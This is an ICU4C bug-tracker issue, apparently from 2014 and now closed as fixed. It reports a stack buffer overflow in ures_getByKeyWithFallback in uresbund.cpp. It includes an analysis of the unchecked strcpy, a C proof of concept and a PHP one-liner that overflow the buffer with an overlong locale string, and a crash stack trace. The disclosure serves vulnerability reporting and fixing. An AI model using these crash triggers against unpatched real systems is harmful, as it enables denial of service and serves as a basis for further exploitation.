We're updating the issue view to help you get more done. 

buffer overflow vulnerability in uresbund.cpp

Description

Reported by Michele Spagnuolo mikispag at google.com

Hello icu-team,

I would like to report a buffer overflow vulnerability I have discovered in libicu while fuzzing the bundled version in the latest PHP 5.5.12 (libicu 4.8.1.1).

Nicolas (nruff@) came up with this analysis of the bug:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ===== https://cs.corp.google.com/#piper///depot/google3/third_party/icu/source/common/uresbund.cpp&l=1735 U_CAPI UResourceBundle* U_EXPORT2 ures_getByKeyWithFallback(const UResourceBundle *resB, const char* inKey, UResourceBundle *fillIn, UErrorCode *status) { ... char path[256]; ... if (len > 0) { uprv_memcpy(path, resPath, len); // resPath = "Langages/" when triggered from mikispag@ PoC } uprv_strcpy(path+len, inKey); // inKey is user-supplied so that will end badly ... ...

Here is a trivial PoC that will trigger the bug:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 ------------------------------------------------------------------------------------------------------------------- #include "unicode/utypes.h" #include "unicode/uenum.h" #define RESLEN 512 // COMPILE WITH: // gcc -o funicu funicu.c `pkg-config --libs --cflags icu-uc icu-i18n icu-le icu-lx icu-io` int main(void) { char locale[512]; UChar *result; UErrorCode *err; int32_t rc; int i; result = malloc(RESLEN); err = malloc(sizeof(UErrorCode)); memset(locale, '*', sizeof(locale)); locale[ sizeof(locale)-1 ] = '\x00'; rc = uloc_getDisplayName( locale, // const localeID "en_US", // const inLocaleID result, // result RESLEN, // maxresultSize err ); return 0; } -------------------------------------------------------------------------------------------------------------------

The PHP snippet that triggers the crash:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 *** stack smashing detected ***: php terminated <?php // Any string > 255 characters passed as the first parameter of locale_get_display_name // will cause a buffer overflow in ICU library (libicuuc.so) // // #0 0x00007ffff3d0c425 in __GI_raise (sig=<optimized out>) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64 // #1 0x00007ffff3d0fb8b in __GI_abort () at abort.c:91 // #2 0x00007ffff3d4a39e in __libc_message (do_abort=2, fmt=0x7ffff3e5257f "*** %s ***: %s terminated\n") at ../sysdeps/unix/sysv/linux/libc_fatal.c:201 // #3 0x00007ffff3de0f47 in __GI___fortify_fail (msg=0x7ffff3e52567 "stack smashing detected") at fortify_fail.c:32 // #4 0x00007ffff3de0f10 in __stack_chk_fail () at stack_chk_fail.c:29 // #5 0x00007ffff4accdac in ures_getByKeyWithFallback_48 () from /usr/lib/x86_64-linux-gnu/libicuuc.so.48 // #6 0x00007ffff4acce03 in ures_getStringByKeyWithFallback_48 () from /usr/lib/x86_64-linux-gnu/libicuuc.so.48 // #7 0x00007ffff4adda09 in uloc_getTableStringWithFallback_48 () from /usr/lib/x86_64-linux-gnu/libicuuc.so.48 // #8 0x00007ffff4adae1b in ?? () from /usr/lib/x86_64-linux-gnu/libicuuc.so.48 // #9 0x00007ffff4adb037 in ?? () from /usr/lib/x86_64-linux-gnu/libicuuc.so.48 // #10 0x00007ffff4adb0bb in uloc_getDisplayLanguage_48 () from /usr/lib/x86_64-linux-gnu/libicuuc.so.48 // #11 0x00007ffff4adbf45 in uloc_getDisplayName_48 () from /usr/lib/x86_64-linux-gnu/libicuuc.so.48 // #12 0x00000000007041d2 in get_icu_disp_value_src_php (tag_name=0xef83ad "name", ht=1, return_value=0x7ffff7fb2140, return_value_ptr=0x0, this_ptr=0x0, return_value_used=1) // at /tmp/php-5.5.12/ext/intl/locale/locale_methods.c:542 // #13 0x00000000007044c0 in zif_locale_get_display_name (ht=1, return_value=0x7ffff7fb2140, return_value_ptr=0x0, this_ptr=0x0, return_value_used=1) // at /tmp/php-5.5.12/ext/intl/locale/locale_methods.c:602 // #14 0x0000000000b36b2f in zend_do_fcall_common_helper_SPEC (execute_data=0x7ffff7f7a168) at /tmp/php-5.5.12/Zend/zend_vm_execute.h:550 // #15 0x0000000000b3b367 in ZEND_DO_FCALL_SPEC_CONST_HANDLER (execute_data=0x7ffff7f7a168) at /tmp/php-5.5.12/Zend/zend_vm_execute.h:2329 // #16 0x0000000000b3623d in execute_ex (execute_data=0x7ffff7f7a168) at /tmp/php-5.5.12/Zend/zend_vm_execute.h:363 // #17 0x0000000000b362c2 in zend_execute (op_array=0x7ffff7fb3048) at /tmp/php-5.5.12/Zend/zend_vm_execute.h:388 // #18 0x0000000000af6d7d in zend_execute_scripts (type=8, retval=0x0, file_count=3) at /tmp/php-5.5.12/Zend/zend.c:1316 // #19 0x0000000000a5ecbd in php_execute_script (primary_file=0x7fffffffd090) at /tmp/php-5.5.12/main/main.c:2506 // #20 0x0000000000ba453f in do_cli (argc=2, argv=0x14141d0) at /tmp/php-5.5.12/sapi/cli/php_cli.c:994 // #21 0x0000000000ba57d4 in main (argc=2, argv=0x14141d0) at /tmp/php-5.5.12/sapi/cli/php_cli.c:1378 $stringLarge = str_repeat('*', 256); locale_get_display_name($stringLarge);

Environment

Status

Assignee

Andy Heninger

Reporter

Andy Heninger

Labels

tracCc

pedberg

tracCreated

May 08, 2014, 9:54 PM

tracOwner

andy

tracProject

ICU4C

tracReporter

andy

tracResolution

fixed

tracReviewer

markus

tracStatus

closed

Components

Fix versions

Priority

assess